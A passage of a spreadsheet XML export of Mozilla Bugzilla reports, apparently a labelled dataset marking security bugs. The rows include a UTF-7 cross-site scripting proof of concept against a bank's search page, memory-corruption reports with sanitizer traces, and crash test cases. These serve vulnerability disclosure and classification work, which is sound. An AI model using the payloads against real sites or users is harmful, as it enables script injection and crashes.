&lt;object type="text/html; charset=UTF-7" data="https://srch01.bankofthewest.com/search?q=%2BACI-%2BAD4-%2BADw-script%2BAD4-alert(document.location)%2BADw-/script%2BAD4-"&gt;&lt;/object&gt;
Actual Results:  
Bank of the West attempts to set the charset using a meta tag, but Firefox ignores it and parses the response document as UTF-7. The exploit is successful.
Expected Results:  
Firefox should not let the "type" attribute of a cross-origin &lt;object&gt; tag influence the charset of the rendered object.
See also: bug 356280, bug 406777, bug 408457, bug 530647, bug 414064</t>
        </is>
      </c>
      <c r="X6075" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6076">
      <c r="A6076" t="n">
        <v>847633</v>
      </c>
      <c r="B6076" t="inlineStr">
        <is>
          <t>2013-03-04 14:30:18 -0800</t>
        </is>
      </c>
      <c r="C6076" t="inlineStr">
        <is>
          <t>Can't push to hg for projects/nss - get Account deactivated error message</t>
        </is>
      </c>
      <c r="D6076" t="inlineStr">
        <is>
          <t>2015-08-17 11:35:50 -0700</t>
        </is>
      </c>
      <c r="E6076" t="n">
        <v>1</v>
      </c>
      <c r="F6076" t="n">
        <v>1</v>
      </c>
      <c r="G6076" t="n">
        <v>6</v>
      </c>
      <c r="H6076" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6076" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations Graveyard</t>
        </is>
      </c>
      <c r="J6076" t="inlineStr">
        <is>
          <t>Account Requests</t>
        </is>
      </c>
      <c r="K6076" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6076" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6076" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6076" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6076" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6076" t="inlineStr"/>
      <c r="Q6076" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6076" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6076" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6076" t="n">
        <v>1</v>
      </c>
      <c r="U6076" t="n">
        <v>0</v>
      </c>
      <c r="V6076" t="n">
        <v>4</v>
      </c>
      <c r="W6076" t="inlineStr">
        <is>
          <t>Folliing the instrctions on https://wiki.mozilla.org/NSS:UsingHG
hg clone https://hg.mozilla.org/projects/nss/ 
Once I got an r+ on Bug 841883. I edited the file I/m working on.
Did an hg commit but I can't push. 
$ hg push
pushing to ssh://emaldona%40redhat.com@hg.mozilla.org/projects/nss/
remote: Your mercurial account has been disabled due                               to inactivity.
remote: Please file a bug at  https://bugzilla.mozilla.org (or                   http://tinyurl.com/2aveg9k) to re-activate  your account.
abort: no suitable response from remote hg!
I have been commiting for four years and now we have switched to git.
As far as I can tell I have congired my system by the book. 
Has my account really been deactivated?</t>
        </is>
      </c>
      <c r="X6076" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6077">
      <c r="A6077" t="n">
        <v>852923</v>
      </c>
      <c r="B6077" t="inlineStr">
        <is>
          <t>2013-03-20 04:29:49 -0700</t>
        </is>
      </c>
      <c r="C6077" t="inlineStr">
        <is>
          <t>nsBoxObject::GetPresShell flushes without keeping the doc alive</t>
        </is>
      </c>
      <c r="D6077" t="inlineStr">
        <is>
          <t>2013-11-25 13:26:33 -0800</t>
        </is>
      </c>
      <c r="E6077" t="n">
        <v>1</v>
      </c>
      <c r="F6077" t="n">
        <v>1</v>
      </c>
      <c r="G6077" t="n">
        <v>3</v>
      </c>
      <c r="H6077" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6077" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6077" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K6077" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6077" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6077" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6077" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6077" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6077" t="inlineStr">
        <is>
          <t>[adv-main20+][adv-esr1705+]</t>
        </is>
      </c>
      <c r="Q6077" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6077" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6077" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T6077" t="n">
        <v>1</v>
      </c>
      <c r="U6077" t="n">
        <v>0</v>
      </c>
      <c r="V6077" t="n">
        <v>12</v>
      </c>
      <c r="W6077" t="inlineStr">
        <is>
          <t>Created attachment 727143
patch
nsBoxObject::GetPresShell keeps a raw pointer to document and calls flush.
The flush operation itself should be safe these days, but the raw document pointer may
point to a deleted object after the flush, yet we use the document.</t>
        </is>
      </c>
      <c r="X6077" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6078">
      <c r="A6078" t="n">
        <v>1346411</v>
      </c>
      <c r="B6078" t="inlineStr">
        <is>
          <t>2017-03-10 14:25:32 -0800</t>
        </is>
      </c>
      <c r="C6078" t="inlineStr">
        <is>
          <t>Update context menu for new Activity Stream Panel</t>
        </is>
      </c>
      <c r="D6078" t="inlineStr">
        <is>
          <t>2017-04-03 09:51:24 -0700</t>
        </is>
      </c>
      <c r="E6078" t="n">
        <v>1</v>
      </c>
      <c r="F6078" t="n">
        <v>1</v>
      </c>
      <c r="G6078" t="n">
        <v>2</v>
      </c>
      <c r="H6078" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6078" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J6078" t="inlineStr">
        <is>
          <t>Home screen</t>
        </is>
      </c>
      <c r="K6078" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6078" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M6078" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N6078" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6078" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6078" t="inlineStr">
        <is>
          <t>[mobileAS]</t>
        </is>
      </c>
      <c r="Q6078" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6078" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6078" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6078" t="n">
        <v>1</v>
      </c>
      <c r="U6078" t="n">
        <v>0</v>
      </c>
      <c r="V6078" t="n">
        <v>6</v>
      </c>
      <c r="W6078" t="inlineStr">
        <is>
          <t>Migrating AS into a UICollectionView has broken the Context menu. Make sure the context menu works correctly. 
A few other things have also changed that should be fixed with this PR. 
There are now UIImageViewExtensions to set Favicons that provide correct background colors. So no need to pass the UIImage and UIColor from the HighlightCell/TopSiteCell to the context menu.</t>
        </is>
      </c>
      <c r="X6078" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6079">
      <c r="A6079" t="n">
        <v>466407</v>
      </c>
      <c r="B6079" t="inlineStr">
        <is>
          <t>2008-11-23 19:12:21 -0800</t>
        </is>
      </c>
      <c r="C6079" t="inlineStr">
        <is>
          <t>History menu often shows duplicated items</t>
        </is>
      </c>
      <c r="D6079" t="inlineStr">
        <is>
          <t>2009-01-27 09:09:31 -0800</t>
        </is>
      </c>
      <c r="E6079" t="n">
        <v>1</v>
      </c>
      <c r="F6079" t="n">
        <v>1</v>
      </c>
      <c r="G6079" t="n">
        <v>2</v>
      </c>
      <c r="H6079" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6079" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6079" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K6079" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6079" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6079" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6079" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6079" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6079" t="inlineStr"/>
      <c r="Q6079" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6079" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6079" t="inlineStr">
        <is>
          <t>Firefox 3.6a1</t>
        </is>
      </c>
      <c r="T6079" t="n">
        <v>1</v>
      </c>
      <c r="U6079" t="n">
        <v>0</v>
      </c>
      <c r="V6079" t="n">
        <v>14</v>
      </c>
      <c r="W6079" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1b2pre) Gecko/20081124 Minefield/3.1b2pre
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1b2pre) Gecko/20081124 Minefield/3.1b2pre
The History menu in Firefox often shows duplicate menu items for recently-visited pages; each time a new page is visited (or a previous location re-visited), it is inserted twice at the start of the menu.
When a new page is visited, existing duplicates may be cleaned out from the menu (so that only the newest item is duplicated), although this does not seem to happen in every case.
Reproducible: Always
Steps to Reproduce:
1. launch Firefox
2. open the History menu
3. choose a page from the middle of the menu, and wait for it to load
4. re-open the History menu
Actual Results:  
The revisited page appears twice at the top of the History menu.
Expected Results:  
The entry for the revisited page should be moved from its position in the middle of the History menu to the top of the list, but should only appear there once.
This has been observed on both Mac OS X and Linux builds from mozilla-central. I'm not sure if it is reproducible 100% of the time, but it is pretty consistent when browsing around some simple URLs such as
   http://www.mozilla.org/projects/minefield/
   https://developer.mozilla.org/en/Installing_Mercurial
   https://developer.mozilla.org/en/Configuring_Build_Options
   https://developer.mozilla.org/en/Build_Documentation
etc.
Note that the duplication is NOT seen when using "Show All History" to view the list in the Library window; it appears to only affect the menu.
It is not clear whether this is related to bug 424208, which refers to the History suggestions shown while typing a location.</t>
        </is>
      </c>
      <c r="X6079" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6080">
      <c r="A6080" t="n">
        <v>1230222</v>
      </c>
      <c r="B6080" t="inlineStr">
        <is>
          <t>2015-12-03 09:52:11 -0800</t>
        </is>
      </c>
      <c r="C6080" t="inlineStr">
        <is>
          <t>[Meta] Encourage tools that interact with our API to set informative user agents</t>
        </is>
      </c>
      <c r="D6080" t="inlineStr">
        <is>
          <t>2019-02-04 02:43:12 -0800</t>
        </is>
      </c>
      <c r="E6080" t="n">
        <v>1</v>
      </c>
      <c r="F6080" t="n">
        <v>1</v>
      </c>
      <c r="G6080" t="n">
        <v>7</v>
      </c>
      <c r="H6080" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6080" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J6080" t="inlineStr">
        <is>
          <t>Treeherder: API</t>
        </is>
      </c>
      <c r="K6080" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L6080" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6080" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6080" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6080" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6080" t="inlineStr"/>
      <c r="Q6080" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R6080" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6080" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6080" t="n">
        <v>1</v>
      </c>
      <c r="U6080" t="n">
        <v>0</v>
      </c>
      <c r="V6080" t="n">
        <v>10</v>
      </c>
      <c r="W6080" t="inlineStr">
        <is>
          <t>There are times when we're looking at New Relic or gunicorn logs and are trying to work out where a request originated from.
For submissions to us, we now have the hawk client_id to help inform this, however:
1) This doesn't help identify GETs
2) The client_id is in the auth header, which isn't present in the gunicorn logs or New Relic transaction traces (albeit the latter will be helped by bug 1124278), unlike the user agent
treeherder-client uses a user agent of eg:
  treeherder-pyclient/1.8.0
TreeBot uses eg:
  TreeBot/0.1
We should try and identify tools other than those that don't set a custom UA, and file bugs/open PRs to add one.
There are also places within Treeherder itself, where we should be setting a UA but don't (eg the bugscache lookups that doesn't use treeherder-client) - plus we should of course do the right thing with requests we make to third party services too (like hg.mozilla.org).</t>
        </is>
      </c>
      <c r="X6080" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6081">
      <c r="A6081" t="n">
        <v>1653371</v>
      </c>
      <c r="B6081" t="inlineStr">
        <is>
          <t>2020-07-16 12:00:39 -0700</t>
        </is>
      </c>
      <c r="C6081" t="inlineStr">
        <is>
          <t>heap overflow in libmar</t>
        </is>
      </c>
      <c r="D6081" t="inlineStr">
        <is>
          <t>2021-11-22 23:27:42 -0800</t>
        </is>
      </c>
      <c r="E6081" t="n">
        <v>1</v>
      </c>
      <c r="F6081" t="n">
        <v>1</v>
      </c>
      <c r="G6081" t="n">
        <v>3</v>
      </c>
      <c r="H6081" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6081" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J6081" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K6081" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6081" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6081" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6081" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6081" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6081" t="inlineStr">
        <is>
          <t>[adv-main80+]</t>
        </is>
      </c>
      <c r="Q6081" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6081" t="inlineStr">
        <is>
          <t>S4</t>
        </is>
      </c>
      <c r="S6081" t="inlineStr">
        <is>
          <t>mozilla80</t>
        </is>
      </c>
      <c r="T6081" t="n">
        <v>1</v>
      </c>
      <c r="U6081" t="n">
        <v>0</v>
      </c>
      <c r="V6081" t="n">
        <v>12</v>
      </c>
      <c r="W6081" t="inlineStr">
        <is>
          <t>Created attachment 9164121
testcase.mar.zip
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Steps to reproduce:
Hi, i just found heap overflow.
attacker can trigger a heap overflow using a maliciously crafted mar file.
However, this vulnerability is difficult to exploit. 
this is asan result:
vm@ubuntu:~/Desktop$ ./mar -T ./TEST.mar 
Signature block found with 0 signatures
1 additional block found:
  - Product Information Block:
    - MAR channel name: firefox-mozilla-central
    - Product version: 38.0a1
SIZE	MODE	NAME
UndefinedBehaviorSanitizer:DEADLYSIGNAL
==2740700==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x7fead7b12000 (pc 0x7fead7ab97ce bp 0x000080000000 sp 0x7fffba0b4eb8 T2740700)
==2740700==The signal is caused by a READ memory access.
    #0 0x7fead7ab97ce  /build/glibc-YYA7BZ/glibc-2.31/string/../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:499
    #1 0x428efb in mar_insert_item /home/vm/firefox-source/modules/libmar/src/mar_read.c:42:3
    #2 0x428efb in mar_consume_index /home/vm/firefox-source/modules/libmar/src/mar_read.c:109:10
    #3 0x428efb in mar_read_index /home/vm/firefox-source/modules/libmar/src/mar_read.c:149:29
    #4 0x42922c in mar_enum_items /home/vm/firefox-source/modules/libmar/src/mar_read.c:574:9
    #5 0x426300 in mar_test /home/vm/firefox-source/modules/libmar/tool/mar.c:120:3
    #6 0x426300 in main /home/vm/firefox-source/modules/libmar/tool/mar.c:311:14
    #7 0x7fead79520b2 in __libc_start_main /build/glibc-YYA7BZ/glibc-2.31/csu/../csu/libc-start.c:308:16
    #8 0x4045fd in _start (/home/vm/Desktop/mar+0x4045fd)
UndefinedBehaviorSanitizer can not provide additional info.
SUMMARY: UndefinedBehaviorSanitizer: SEGV /build/glibc-YYA7BZ/glibc-2.31/string/../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:499 
==2740700==ABORTING
bug is here:
https://searchfox.org/mozilla-central/source/modules/libmar/src/mar_read.c#42
namelen can be 0x7fffffff then namelen will be 0xffffffff80000000 when execute memcpy function.</t>
        </is>
      </c>
      <c r="X6081" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6082">
      <c r="A6082" t="n">
        <v>1754066</v>
      </c>
      <c r="B6082" t="inlineStr">
        <is>
          <t>2022-02-07 13:04:19 -0800</t>
        </is>
      </c>
      <c r="C6082" t="inlineStr">
        <is>
          <t>Missing security checks for fetching `sourceMapURL` for CSS/JS from devtools</t>
        </is>
      </c>
      <c r="D6082" t="inlineStr">
        <is>
          <t>2023-07-26 18:56:11 -0700</t>
        </is>
      </c>
      <c r="E6082" t="n">
        <v>1</v>
      </c>
      <c r="F6082" t="n">
        <v>1</v>
      </c>
      <c r="G6082" t="n">
        <v>3</v>
      </c>
      <c r="H6082" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6082" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J6082" t="inlineStr">
        <is>
          <t>Framework</t>
        </is>
      </c>
      <c r="K6082" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6082" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M6082" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6082" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6082" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6082" t="inlineStr">
        <is>
          <t>[keep hidden while bug 1756536 is][adv-main99+]</t>
        </is>
      </c>
      <c r="Q6082" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6082" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S6082" t="inlineStr">
        <is>
          <t>99 Branch</t>
        </is>
      </c>
      <c r="T6082" t="n">
        <v>1</v>
      </c>
      <c r="U6082" t="n">
        <v>0</v>
      </c>
      <c r="V6082" t="n">
        <v>15</v>
      </c>
      <c r="W6082" t="inlineStr">
        <is>
          <t>In bug 1746089 we're looking into an auth issue with source maps. This prompted me to look into source map fetching a bit. I'm filing this bug because I can't find any security checks.
In particular, I think `https://sitea.com/` shouldn't be able to say its source map is at `file:///etc/passwd` or `chrome://browser/content/`. I don't know what restrictions are specced for this, but if these are CORS requests they should probably adhere to CORS headers (I guess? Might need checking with a spec, if any exists - are source maps allowed to be on `https://siteb.com/` in this case without any CORS stuff in place?), they should send the right referrer headers (subject to the including page's referrer policy and the like), etc. etc.
Julian suggests the actual fetch happens in https://searchfox.org/mozilla-central/rev/4615b544a0f7166233c409c619b426c4025467a7/devtools/client/shared/source-map/worker.js#154 from a chrome privileged worker. Because it's system principal, I think it can do whatever it likes, and none of the relevant CORS / referrer info will be included. That seems potentially bad (as in, combined with timing attacks can probably at least determine some privacy-sensitive stuff, or worse).
Now, hopefully there are security checks somewhere between there and where we determine the source map URL - but I'm not sure where that is, and some very quick searching isn't throwing it up. The source map URL for CSS is tracked on the stylesheet, and originally comes from a header or a comment in the stylesheet, but the [platform code that stores this info](https://searchfox.org/mozilla-central/rev/4615b544a0f7166233c409c619b426c4025467a7/layout/style/StyleSheet.cpp#566-581) doesn't appear to do any checking of its own.
:ochameau, do you know if I'm just not finding the right place where we do do the security checks? If not, what would be involved in getting some checks in place, and passing the right principal to the code doing the fetching?</t>
        </is>
      </c>
      <c r="X6082" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6083">
      <c r="A6083" t="n">
        <v>895557</v>
      </c>
      <c r="B6083" t="inlineStr">
        <is>
          <t>2013-07-18 12:09:46 -0700</t>
        </is>
      </c>
      <c r="C6083" t="inlineStr">
        <is>
          <t>It's possible to set a document's URI to a different document's URI by confusing docshell</t>
        </is>
      </c>
      <c r="D6083" t="inlineStr">
        <is>
          <t>2015-08-30 12:00:36 -0700</t>
        </is>
      </c>
      <c r="E6083" t="n">
        <v>1</v>
      </c>
      <c r="F6083" t="n">
        <v>1</v>
      </c>
      <c r="G6083" t="n">
        <v>3</v>
      </c>
      <c r="H6083" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6083" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6083" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K6083" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6083" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6083" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N6083" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6083" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6083" t="inlineStr">
        <is>
          <t>[adv-main29+][adv-esr24.5+]</t>
        </is>
      </c>
      <c r="Q6083" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6083" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6083" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T6083" t="n">
        <v>1</v>
      </c>
      <c r="U6083" t="n">
        <v>0</v>
      </c>
      <c r="V6083" t="n">
        <v>47</v>
      </c>
      <c r="W6083" t="inlineStr">
        <is>
          <t>Bug 803870 was fixed by disallowing cross-origin history access, but the key problem is not fixed and it is still abusable with subframe.
the problem is:
history.forward(); // A
location.hash='a'; // B
1) A sets mLSHE to a SHEntry to be loaded.
2) B sets mLSHE to null and sets mOSHE to a new SHEntry.
3) the history load is processed, but nsDocShell::Embed does not update mOSHE since mLSHE is null.</t>
        </is>
      </c>
      <c r="X6083" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6084">
      <c r="A6084" t="n">
        <v>876762</v>
      </c>
      <c r="B6084" t="inlineStr">
        <is>
          <t>2013-05-28 10:09:34 -0700</t>
        </is>
      </c>
      <c r="C6084" t="inlineStr">
        <is>
          <t>ABORT: bad scope for new JSObjects: 'js::IsObjectInContextCompartment(lccx.GetScopeForNewJSObjects(), cx)' under ReparentWrapper / document.open</t>
        </is>
      </c>
      <c r="D6084" t="inlineStr">
        <is>
          <t>2014-11-19 20:11:51 -0800</t>
        </is>
      </c>
      <c r="E6084" t="n">
        <v>1</v>
      </c>
      <c r="F6084" t="n">
        <v>1</v>
      </c>
      <c r="G6084" t="n">
        <v>3</v>
      </c>
      <c r="H6084" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6084" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6084" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K6084" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6084" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6084" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6084" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6084" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6084" t="inlineStr">
        <is>
          <t>[adv-main24+][adv-esr1709+]</t>
        </is>
      </c>
      <c r="Q6084" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6084" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6084" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T6084" t="n">
        <v>1</v>
      </c>
      <c r="U6084" t="n">
        <v>0</v>
      </c>
      <c r="V6084" t="n">
        <v>29</v>
      </c>
      <c r="W6084" t="inlineStr">
        <is>
          <t>Created attachment 754887
Stack
STR:
1. Paste the following into the live dom viewer
&lt;iframe src=about:blank&gt;&lt;/iframe&gt;
...&lt;script&gt;
onload = function() {
document.open()
}
&lt;/script&gt;
2. Type something random on the empty line</t>
        </is>
      </c>
      <c r="X6084" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6085">
      <c r="A6085" t="n">
        <v>1254721</v>
      </c>
      <c r="B6085" t="inlineStr">
        <is>
          <t>2016-03-08 14:51:09 -0800</t>
        </is>
      </c>
      <c r="C6085" t="inlineStr">
        <is>
          <t>Crash [@ stagefright::SampleTable::parseSampleCencInfo] with heap buffer overflow in libstagefright.</t>
        </is>
      </c>
      <c r="D6085" t="inlineStr">
        <is>
          <t>2024-05-30 09:15:25 -0700</t>
        </is>
      </c>
      <c r="E6085" t="n">
        <v>1</v>
      </c>
      <c r="F6085" t="n">
        <v>1</v>
      </c>
      <c r="G6085" t="n">
        <v>3</v>
      </c>
      <c r="H6085" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6085" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6085" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K6085" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6085" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6085" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6085" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6085" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6085" t="inlineStr">
        <is>
          <t>[adv-main46+][adv-esr45.1+][adv-esr38.8+]</t>
        </is>
      </c>
      <c r="Q6085" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6085" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6085" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T6085" t="n">
        <v>1</v>
      </c>
      <c r="U6085" t="n">
        <v>0</v>
      </c>
      <c r="V6085" t="n">
        <v>24</v>
      </c>
      <c r="W6085" t="inlineStr">
        <is>
          <t>There is a bug in libstagefright which causes Firefox to crash (invalid read).
I attached a test case to this report. As this seems to be exploitable, I marked this report as security related.
I downloaded Firefox 48.0a1 from: https://ftp.mozilla.org/pub/firefox/tinderbox-builds/mozilla-central-linux64-asan/1457435058/firefox-48.0a1.en-US.linux-x86_64-asan.tar.bz2
The corresponding HG revision is: 05c087337043dd8e71cc27bdb5b9d55fd00aaa26
While inspecting SampleTable.cpp and investigating the issue, I stumbled upon this code fragment (SampleTable:639-640):
    if (!mCencSizes.IsEmpty() &amp;&amp; mCencOffsets.Length() &gt; 1 &amp;&amp;
        mCencSizes.IsEmpty() != mCencOffsets.Length()) {
        return ERROR_MALFORMED;
    }
which is semantically equivalent to:
    if (!mCencSizes.IsEmpty() &amp;&amp; mCencOffsets.Length() &gt; 1) {
        return ERROR_MALFORMED;
    }
I'm not sure what the condition is supposed to be, but it's probably supposed to be an '||' and something around comparing lengths.
The actual place where the crash appears is here (SampleTable:655-657):
   for (uint32_t i = 0; i &lt; mCencInfoCount; i++) {
        uint8_t size = mCencDefaultSize ? mCencDefaultSize : mCencSizes[i];      /// &lt;--
        uint64_t offset = mCencOffsets.Length() == 1 ? nextOffset : mCencOffsets[i];
The reason is the access to mCencSizes[i] with i=0 while mCencOffsets is empty. 
At this time, mCencOffsets.Length is 2 and mCencSizes.Length is 0. This goes probably back to the initial (wrong or incomplete?) malform check.
During the execution I got the ASAN trace attached to this report, as well as a crash with SIGILL. 
When executing a debug build, I also get:
	Assertion failure: aIndex &lt; Length() (invalid array index)</t>
        </is>
      </c>
      <c r="X6085" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6086">
      <c r="A6086" t="n">
        <v>714631</v>
      </c>
      <c r="B6086" t="inlineStr">
        <is>
          <t>2012-01-02 07:22:52 -0800</t>
        </is>
      </c>
      <c r="C6086" t="inlineStr">
        <is>
          <t>Redirect to an HTTPS resource that returns an Atom/RSS content type with an invalid body causes the site identity block to show the resource's identity for the source's content</t>
        </is>
      </c>
      <c r="D6086" t="inlineStr">
        <is>
          <t>2024-05-29 15:57:14 -0700</t>
        </is>
      </c>
      <c r="E6086" t="n">
        <v>1</v>
      </c>
      <c r="F6086" t="n">
        <v>1</v>
      </c>
      <c r="G6086" t="n">
        <v>6</v>
      </c>
      <c r="H6086" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6086" t="inlineStr">
        <is>
